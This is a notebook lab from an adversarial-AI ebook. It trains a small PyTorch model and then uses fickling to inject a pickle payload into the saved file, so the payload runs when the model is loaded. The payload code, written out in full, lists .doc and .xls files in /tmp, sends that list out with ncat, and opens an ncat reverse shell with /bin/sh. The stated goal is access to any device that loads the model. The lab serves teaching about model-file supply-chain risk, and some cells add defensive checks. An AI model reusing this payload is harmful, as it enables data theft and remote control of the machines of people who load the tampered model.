<img style="max-width:20em; height:auto;" src="../graphics/A-Little-Book-on-Adversarial-AI-Cover.png"/>

Author: Nik Alleyne   
Author Blog: https://www.securitynik.com   
Author GitHub: github.com/securitynik   

Author Other Books: [   

            "https://www.amazon.ca/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458/",   
            
            "https://www.amazon.ca/Learning-Practicing-Mastering-Network-Forensics/dp/1775383024/"   
        ]   


This notebook ***(fickling_neural_net.ipynb)*** is part of the series of notebooks from ***A Little Book on Adversarial AI***, a free ebook released by Nik Alleyne.

### Fickling Neural Nets  

Now that we understand this problem from a traditional machine learning perspective and have learned that it all comes down to the **`__reduce__`** method, let us try another toy dataset, this time looking at the issue from a Neural Network (Deep Learning) perspective. 

More importantly, rather than running commands to query the local host, we are going to jump ahead and set up a reverse shell, giving us access to the device that loads the model.
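
As a quick refresher on why `__reduce__` matters, here is a minimal sketch using only the standard library. The `Harmless` class is a hypothetical stand-in, not part of this lab: its `__reduce__` returns a harmless built-in and one argument, and pickle calls that built-in when the bytes are loaded. An attacker simply swaps in a different callable.

```python
import pickle


class Harmless:
    """Toy object whose pickle stream asks the loader to call len('pickle')."""

    def __reduce__(self):
        # pickle stores (callable, args) and calls callable(*args) at load time.
        # A harmless built-in stands in for what an attacker would place here.
        return (len, ("pickle",))


blob = pickle.dumps(Harmless())

# Loading does not rebuild a Harmless instance; it returns whatever the callable returned.
result = pickle.loads(blob)
print(type(result).__name__, result)
```

The loader never needed the `Harmless` class at all, which is why simply loading an untrusted file is enough to run someone else's code.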


### Lab Objectives:  
- Extend our understanding of the pickle problem   
- Recognize that this is not just about traditional machine learning but also deep learning   
- Expand our knowledge by gaining access to remote devices when they load the compromised model    


### Step 1:

In [1]:
# Import the libraries 
from sklearn.datasets import make_classification
import torch
import torch.nn as nn
import torch.nn.functional as F

In [2]:
### Version of key libraries used  
print(f'Torch version used:  {torch.__version__}')

Torch version used:  2.7.1+cu128


In [3]:
# Setup the device to work with
# This should ensure if there are accelerators in place, such as Apple backend or CUDA, 
# we should be able to take advantage of it.

if torch.cuda.is_available():
    print('Setting the device to cuda')
    device = 'cuda'
elif torch.backends.mps.is_available():
    print('Setting the device to Apple mps')
    device = 'mps'
else:
    print('Setting the device to CPU')
    device = 'cpu'

Setting the device to cuda


In [4]:
# Create the toy dataset
X, y = make_classification(n_samples=100, n_classes=2, random_state=10)

# Take a sneak peek at the first 5 records of X and y
X[:5], y[:5]

(array([[-1.01767522, -2.39557201,  0.5039269 , -1.19420581, -0.36427809,
          0.26439469,  1.08522707, -0.14506454,  0.89256403,  0.18833121,
          0.20732957,  0.78108986,  0.88577486,  0.30866767,  0.35693907,
          0.0110227 , -0.85752252,  2.31912732, -0.86785291,  0.98007413],
        [-0.5864071 ,  0.73717898,  0.70387872, -0.73048734,  0.97055953,
          0.53348902,  0.00471054,  0.21855883,  0.56292179, -0.60498772,
         -0.46253912,  0.49881915,  0.52454074,  0.19212229,  0.14703394,
          0.62745097,  1.20290292, -0.25355802, -0.68472634, -0.33994862],
        [ 1.53291452, -0.56298605, -0.19748563,  1.20806065, -0.26513777,
          0.47868925, -1.17629904,  1.21411355, -0.48274742, -2.37675778,
         -1.76559325, -0.49683225,  1.19953434, -0.43228335,  0.43065099,
         -0.98142548, -0.31481729,  0.78499888, -1.26796367,  0.72482979],
        [-1.00174936,  0.86417055, -0.19682771, -0.88362438,  1.02783893,
          0.08498287, -0.4141195 , 

In [5]:
# Get the shape of the data
print(f'X.shape is: {X.shape}')
print(f'y.shape is: {y.shape}')

X.shape is: (100, 20)
y.shape is: (100,)


In [6]:
# To use this in our PyTorch neural network, 
# we need to convert these from numpy arrays to PyTorch tensors

print(f"X's data type before conversion is: {type(X)} -> {X.dtype}")
print(f"y's data type before conversion is: {type(y)} -> {y.dtype}")

print(f'\nConverting both X and y to PyTorch tensors ...')

# Convert these samples from numpy arrays to torch tensors
X = torch.tensor(data=X, dtype=torch.float32, device=device)
y = torch.tensor(data = y.reshape(-1, 1), dtype=torch.float32, device=device)

print(f"\nX's data type after conversion is: {type(X)} -> {X.dtype}")
print(f"y's data type after conversion is: {type(y)} -> {y.dtype}")


X's data type before conversion is: <class 'numpy.ndarray'> -> float64
y's data type before conversion is: <class 'numpy.ndarray'> -> int64

Converting both X and y to PyTorch tensors ...

X's data type after conversion is: <class 'torch.Tensor'> -> torch.float32
y's data type after conversion is: <class 'torch.Tensor'> -> torch.float32


### !Note:  
The network we are going to build is based on the architecture below, with one difference: our network has 20 input neurons (one per feature), while the diagram shows only seven, simply because I was not able to add more in the playground. The concepts remain exactly the same once we pass the input layer. There is one hidden layer with 8 neurons, and those 8 neurons connect to a single output neuron. This will be a binary classification problem.  

<img style="max-width:40em; height:auto;" src="../graphics/tf_playground_neural_net.png"/>
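
To get a feel for how small this network is, the sketch below counts its learnable parameters in plain Python. It assumes every fully connected layer has a bias term, which is the default for `nn.Linear`; the helper name `count_parameters` is made up for this illustration.

```python
# Layer sizes from the note above: 20 inputs -> 8 hidden neurons -> 1 output
layer_sizes = [20, 8, 1]


def count_parameters(sizes):
    """Count weights and biases for a stack of fully connected layers."""
    total = 0
    for n_in, n_out in zip(sizes[:-1], sizes[1:]):
        total += n_in * n_out  # one weight per input/output pair
        total += n_out         # one bias per output neuron
    return total


total_parameters = count_parameters(layer_sizes)
print(total_parameters)  # 177
```

The first layer contributes 20 × 8 + 8 = 168 parameters and the second 8 × 1 + 1 = 9.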


### Step 2:  

In [7]:
# Create a simple torch network
class SimpleNet(nn.Module):
    def __init__(self,):
        super().__init__()
        self.layers = nn.Sequential( 
            nn.Linear(in_features=X.size(dim=1), out_features=8),
            nn.ReLU(),
            nn.Linear(in_features=8, out_features=1),
            nn.Sigmoid()
        )
    
    def forward(self, x):
        out = self.layers(x)
        return out

In [8]:
# Set a random seed so the parameters always start at the same place
torch.manual_seed(seed=10)

# Instantiate the model
simple_model = SimpleNet().to(device=device)

# Make predictions on the untrained model
untrained_preds = simple_model(X.to(device))

# Take a look at the first 10 records
untrained_preds[:10]

tensor([[0.5659],
        [0.4796],
        [0.5605],
        [0.5314],
        [0.5363],
        [0.5383],
        [0.5140],
        [0.5458],
        [0.5480],
        [0.4835]], device='cuda:0', grad_fn=<SliceBackward0>)

In [9]:
# Get the untrained model accuracy
# This suggests the untrained model has 50% accuracy
(untrained_preds.round() == y).sum() / y.size(dim=0) 

tensor(0.5000, device='cuda:0')

In [10]:
# Train the model, similar to what would happen in the real world
# Setup a loss function
loss_fn = nn.BCELoss()

# Setup the optimizer to handle gradient descent
optimizer = torch.optim.AdamW(params=simple_model.parameters(), lr=0.01)

# Set the number of epochs
num_epochs = 100

# Put the model in train mode
simple_model.train(mode=True)

# Train the model
for epoch in range(num_epochs):
    # Clear the gradients
    for p in simple_model.parameters():
        p.grad = None

    # make the predictions
    preds = simple_model(X)
    loss = loss_fn(input=preds, target=y)

    # perform backpropagation
    loss.backward()

    # Perform gradient descent
    optimizer.step()

    # calculate the model accuracy
    accuracy = (y == preds.round()).sum()/y.size(dim=0)
    
    if epoch % 10 == 0:
        print(f'Epoch: {epoch+1}/{num_epochs} \taccuracy:{accuracy} \t loss:{loss}')

Epoch: 1/100 	accuracy:0.5 	 loss:0.7180083990097046
Epoch: 11/100 	accuracy:0.8100000023841858 	 loss:0.5911996960639954
Epoch: 21/100 	accuracy:0.8899999856948853 	 loss:0.45934081077575684
Epoch: 31/100 	accuracy:0.9300000071525574 	 loss:0.325526624917984
Epoch: 41/100 	accuracy:0.949999988079071 	 loss:0.22560203075408936
Epoch: 51/100 	accuracy:0.9799999594688416 	 loss:0.15741677582263947
Epoch: 61/100 	accuracy:0.9799999594688416 	 loss:0.11038202047348022
Epoch: 71/100 	accuracy:0.9899999499320984 	 loss:0.07750357687473297
Epoch: 81/100 	accuracy:0.9899999499320984 	 loss:0.05485496297478676
Epoch: 91/100 	accuracy:0.9899999499320984 	 loss:0.0392584502696991


In [11]:
# Save the model
# This is where PyTorch uses Python's pickle library to save the model
# Use the new zip file format to save the file
# Passing state_dict() tells torch to save only the model's state dictionary
# We could save the entire model object with torch.save(obj=simple_model, ...)
# However, that is not the recommended way to save your models
# Saving the state dictionary is one of the ways you should be saving your models in production
torch.save(obj=simple_model.state_dict(), f='/tmp/my_trusted_simple_model.pth', _use_new_zipfile_serialization=True)

# Validate the model has been created
!ls /tmp/my_trusted_simple_model.pth

# Validate the integrity of the model
!md5sum /tmp/my_trusted_simple_model.pth

/tmp/my_trusted_simple_model.pth
bb4316ec6d2bcbf0d9906352d9f56b49  /tmp/my_trusted_simple_model.pth
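
The `md5sum` check above can also be done from Python. The sketch below is one possible approach using only `hashlib`. The helper name `digest_of` and the temporary demo file are assumptions made for illustration. It defaults to SHA-256, because MD5 is no longer considered collision resistant.

```python
import hashlib
import tempfile
from pathlib import Path


def digest_of(path, algorithm="sha256", chunk_size=65536):
    """Return the hex digest of a file, reading it in chunks."""
    hasher = hashlib.new(algorithm)
    with open(path, "rb") as fp:
        for chunk in iter(lambda: fp.read(chunk_size), b""):
            hasher.update(chunk)
    return hasher.hexdigest()


# Demo on a throwaway file rather than the real model file
with tempfile.TemporaryDirectory() as tmp_dir:
    demo_file = Path(tmp_dir) / "demo_model.pth"
    demo_file.write_bytes(b"original weights")
    trusted = digest_of(demo_file)

    # Any change to the bytes changes the digest
    demo_file.write_bytes(b"original weights plus something extra")
    tampered = digest_of(demo_file) != trusted

print(tampered)
```

A digest only helps if the person loading the model compares it against a value obtained through a channel the attacker cannot modify.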


In [12]:
# Verify that the model can be loaded
# simple_model.load_state_dict(state_dict=torch.load(f=r'/tmp/my_trusted_simple_model.pth', weights_only=False))

### Step 3:   

In [13]:
# Prepare to compromise the model

from fickling.pytorch import PyTorchModelWrapper
# https://github.com/trailofbits/fickling/blob/master/example/inject_pytorch.py
# https://hiddenlayer.com/innovation-hub/machine-learning-threat-roundup/  
# https://blog.trailofbits.com/2024/03/04/relishing-new-fickling-features-for-securing-ml-systems/

In [14]:
# Steal the model .... somehow :-)
# Or share a compromised model.
stolen_model = PyTorchModelWrapper('/tmp/my_trusted_simple_model.pth')
stolen_model

# Validate the model's integrity before compromising it
# This value is the same as above.
!md5sum /tmp/my_trusted_simple_model.pth

bb4316ec6d2bcbf0d9906352d9f56b49  /tmp/my_trusted_simple_model.pth


In [15]:
# Setup a variable with the commands to execute when the model loads
# Notice also, all the libraries we need are being loaded as part of the variable

COMPROMISE_CODE = """   
import os
import subprocess as sp

with open(file='/tmp/recon.txt', mode='wt') as recon_fp:
  recon_fp.write('Beginning Reconnaissance ....\\n')

  for file in os.listdir(path='/tmp/'):
    if file.endswith('.doc') or file.endswith('.xls'):
      recon_fp.write(f'{file}\\n')


  recon_fp.write('Ending Reconnaissance ...\\n')
  print('Exfiltrating ...')

# Exfiltrate the reconnaissance information
# Notice in this case, we are not using the --ssl option. 
# This is just so we understand the importance of encrypting our sessions
# Ensure you have a listener set up on the remote host:
#   $ ncat --verbose --listen 9998 --keep-open
sp.call(['ncat', '--verbose', '127.0.0.1', '9998'], stdin=open(file='/tmp/recon.txt', mode='rt'))

# Create the backdoor reverse shell
# Ensure you set up a netcat listener on the remote host: 
#   $ ncat --verbose --listen 9999 --ssl --keep-open

# This is one way to do it
# We will use another way later, with built-in tools rather than having to install ncat
sp.Popen(['ncat', '--verbose', '127.0.0.1', '9999', '--exec', '/bin/sh', '--ssl'])

"""

# We can run this cell to test the compromise code before using it
#exec(COMPROMISE_CODE)

# However, just like previously, we need to fix this up. We need to get all of this on one line

In [16]:
# Compromise the stolen model
# We would have loved to be able to do something like this
#stolen_model.inject_payload(COMPROMISE_CODE,  output_path='/tmp/new_torch.pt', injection='insertion', overwrite=True)

Instead, we have to do what is shown below. If you find a cleaner way to solve this problem, let me know. This is the same code as above without the comments. Notice that I am using two ports, 9998 and 9999, because we are performing two tasks: first we exfiltrate the reconnaissance data, and second we set up the reverse shell.   
Notice the **--exec /bin/sh**   

Set up two listeners on your host:   
$ **ncat --verbose --listen 9999 --keep-open --ssl**   

$ **ncat --verbose --listen 9998  --keep-open**     


Create a few files in **/tmp/**, the directory the payload searches:   
$ touch /tmp/test.doc   
$ touch /tmp/test1.doc   
$ touch /tmp/test2.doc   
$ touch /tmp/test3.doc   

$ touch /tmp/test.xls   
$ touch /tmp/test1.xls   
$ touch /tmp/test2.xls   
$ touch /tmp/test3.xls   


In [17]:
# Inject the payload into the model
stolen_model.inject_payload(payload="""import os   \nimport subprocess as sp  \nwith open(file='/tmp/recon.txt', mode='wt') as recon_fp:  \n\trecon_fp.write('Beginning Reconnaissance ....\\n')    \n\tfor file in os.listdir(path='/tmp/'):    \n\t\tif file.endswith('.doc') or file.endswith('.xls'):  \n\t\t\trecon_fp.write(f'{file}\\n')  \n\trecon_fp.write('Ending Reconnaissance ...\\n')   \n\tprint('Exfiltrating ...')   \nsp.call(['ncat', '--verbose', '127.0.0.1', '9998'], stdin=open(file='/tmp/recon.txt', mode='rt'))    \nsp.Popen(['ncat', '--verbose', '127.0.0.1', '9999', '--exec', '/bin/sh', '--ssl'])   """, output_path='/tmp/new_torch.pt', injection='insertion', overwrite=True )

In [18]:
# We see below that the model's integrity has changed
!md5sum /tmp/my_trusted_simple_model.pth

43a7e92079c440401db38a63c4effad1  /tmp/my_trusted_simple_model.pth
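
The changed hash tells us the file was modified, but not what was added. One rough way to look inside without executing anything is to walk the pickle opcodes with the standard library's `pickletools`. The sketch below is a heuristic under stated assumptions, not a replacement for fickling's own analysis: the helper names are made up, and it assumes the pickle stream sits in a zip member named `data.pkl`, which is how the zip-based torch format is laid out as far as I know. It runs against an in-memory stand-in archive rather than the real model file.

```python
import io
import pickle
import pickletools
import zipfile


def imported_globals(pickle_bytes):
    """List the module.name references a pickle stream would import, without loading it."""
    found = []
    recent_strings = []
    for opcode, arg, _pos in pickletools.genops(pickle_bytes):
        if opcode.name == "GLOBAL":
            # Older protocols carry "module name" directly in the opcode argument.
            found.append(arg.replace(" ", ".", 1))
        elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            # Protocol 4+ usually pushes module and name as the two preceding strings.
            found.append(f"{recent_strings[-2]}.{recent_strings[-1]}")
        elif isinstance(arg, str):
            recent_strings.append(arg)
    return found


def globals_in_archive(archive_bytes):
    """Scan every zip member named data.pkl (assumed layout) for imported globals."""
    results = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for member in archive.namelist():
            if member.endswith("data.pkl"):
                results.extend(imported_globals(archive.read(member)))
    return results


class Harmless:
    """Hypothetical stand-in: asks the loader to call len('pickle')."""

    def __reduce__(self):
        return (len, ("pickle",))


# Build a stand-in archive in memory instead of touching a real model file.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, mode="w") as archive:
    archive.writestr("demo_model/data.pkl", pickle.dumps(Harmless(), protocol=4))

print(globals_in_archive(buffer.getvalue()))
```

A legitimate state dictionary also references a few globals in order to rebuild its tensors, so the list is something to review rather than a verdict. Anything pointing at code execution or process helpers deserves a closer look.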


In [19]:
# Because we stored the state dict, which is the recommended way of saving torch models, we need to reconstruct the model class
# This is not a problem, as it is exactly what you would do in production
# Note this is just one approach and there are other approaches, 
# such as saving the entire model with torch.save
# or even exporting to TorchScript with torch.jit.save()
# We are going to stick with the recommended way

# Let's recreate the class
# In production we can just copy and paste this code
class SimpleNet(nn.Module):
    def __init__(self,):
        super().__init__()
        self.layers = nn.Sequential( 
            nn.Linear(in_features=X.size(dim=1), out_features=8),
            nn.ReLU(),
            nn.Linear(in_features=8, out_features=1),
            nn.Sigmoid()
        )
    
    def forward(self, x):
        out = self.layers(x)
        return out
    
# Instantiate the class again
simple_model = SimpleNet().to(device=device)
simple_model

SimpleNet(
  (layers): Sequential(
    (0): Linear(in_features=20, out_features=8, bias=True)
    (1): ReLU()
    (2): Linear(in_features=8, out_features=1, bias=True)
    (3): Sigmoid()
  )
)

Remember to set up your netcat listener   
$ ncat --verbose --listen 9999 --ssl   

As always, let's also validate that our solution works outside of the notebook and can run independently of it   
Remember you need to be in your **labs** directory    
$ python load_model.py --model /tmp/my_trusted_simple_model.pth

Now when the user in the organization tries to use the model ...   
Load/deserialize the model to prepare to make predictions.  Simply loading the model here will cause the malicious code to execute. 

Notice that the ncat output is only being shown below so we can see what is happening.  Realistically, we would go back to the COMPROMISE_CODE and remove the --verbose option

In [20]:
# Show that the loaded model can still make predictions
# First put the model in eval mode
#loaded_trusted_pwnd_model.eval()

# Make some predictions
#loaded_trusted_pwnd_model(X)[:10]
#loaded_trusted_pwnd_model

# Load up the model state dictionary
simple_model.load_state_dict(state_dict=torch.load(f=r'/tmp/my_trusted_simple_model.pth', weights_only=False, map_location=device))

Exfiltrating ...


Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Connection refused.
Ncat: Version 7.94SVN ( https://nmap.org/ncat )


<All keys matched successfully>
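
The payload ran because the file was loaded with `weights_only=False`, which lets the unpickler resolve any global the file names. PyTorch's `weights_only=True` option restricts what may be resolved. The sketch below illustrates that allow-list idea with the standard library only. It is not PyTorch's actual implementation, and the class name, helper name and allow-list contents are assumptions chosen for the demo.

```python
import io
import pickle
from collections import OrderedDict


class AllowListUnpickler(pickle.Unpickler):
    """Unpickler that resolves only explicitly approved globals."""

    # Hypothetical allow-list for this illustration; a real one would name
    # exactly the types the expected file format needs.
    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")


def restricted_loads(data):
    """Load pickle bytes through the allow-list unpickler."""
    return AllowListUnpickler(io.BytesIO(data)).load()


class Harmless:
    """Hypothetical stand-in for a payload: asks the loader to call len('pickle')."""

    def __reduce__(self):
        return (len, ("pickle",))


# Plain data built from approved types loads normally
safe_blob = pickle.dumps(OrderedDict(weight=1.0))
print(restricted_loads(safe_blob))

# A stream that asks for any other callable is refused before it can run
try:
    restricted_loads(pickle.dumps(Harmless()))
    blocked = False
except pickle.UnpicklingError as err:
    blocked = True
    print(err)
```

The refusal happens while the global is being resolved, so the callable is never invoked.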

In [21]:
# As always, we still want to know that our model can make predictions
simple_model.eval()

# Make some predictions
simple_model(X)[:10]

tensor([[8.6402e-03],
        [6.1995e-02],
        [2.8719e-03],
        [9.1484e-01],
        [9.5764e-01],
        [9.9731e-01],
        [4.9077e-02],
        [1.1643e-04],
        [9.7802e-01],
        [9.9998e-01]], device='cuda:0', grad_fn=<SliceBackward0>)

In [None]:
# With the training finished, clear the GPU cache
# Check which accelerator is available and clear its cache
if torch.cuda.is_available():
    # For CUDA GPU
    print(f'Cleaning {device} cache')
    torch.cuda.empty_cache()
elif torch.backends.mps.is_available():
    # For Apple devices
    print(f'Cleaning {device} cache')
    torch.mps.empty_cache()
else:
    # Default to cpu
    pass

Cleaning cuda cache


Ncat: TIMEOUT.


# Lab Takeaways:   
- We extended our attacks against the pickle format to neural nets   
- We learned how to perform exfiltration via the models   
- We saw how we could set up a reverse shell by compromising the model   